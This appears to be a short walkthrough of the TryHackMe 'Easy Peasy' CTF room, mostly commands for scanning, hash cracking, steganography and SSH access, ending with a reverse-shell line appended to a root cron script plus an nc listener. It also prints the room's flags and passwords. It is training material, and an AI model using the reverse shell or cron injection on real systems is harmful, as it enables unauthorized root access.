Easy Peasy

Room Link: https://tryhackme.com/room/easypeasyctf

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

port 5698 and 65524 found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Flag #1

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Kali

gobuster dir -u http://$VICTIM/hidden -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Kali

echo "ZmxhZ3tmMXJzN19mbDRnfQ==" |base64 -d

Flag #2

Kali

curl http://$VICTIM:65524/robots.txt

https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250

Flag #3

Hidden Directory

CyberChef: https://gchq.github.io/CyberChef/#recipe=From_Base62('0-9A-Za-z')&input=T2JzSm1QMTczTjJYNmRPckFnRUFMMFZ1

Crack the Hash

Kali

wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py
python hash-id.py 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81

Format turned out to be GOST

Kali

john --wordlist=easypeasy.txt --format=GOST hash.txt

SSH Password

Kali

wget http://$VICTIM:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
steghide extract -sf binarycodepixabay.jpg 
Password: mypasswordforthatjob

Link: https://www.rapidtables.com/convert/number/binary-to-ascii.html

Kali

ssh boring@$VICTIM:6498
Password: iconvertedmypasswordtobinary

User Flag

Link: https://www.dcode.fr/caesar-cipher

Privilege Escalation

Victim

cat /etc/crontab
cd /var/www/
ls -lah

Victim

echo "sh -i >& /dev/tcp/$KALI/1337 0>&1" >> .mysecretcronjob.sh

Kali

nc -lvnp 1337

PreviousArchangel NextColddBox: Easy

Last updated 6 months ago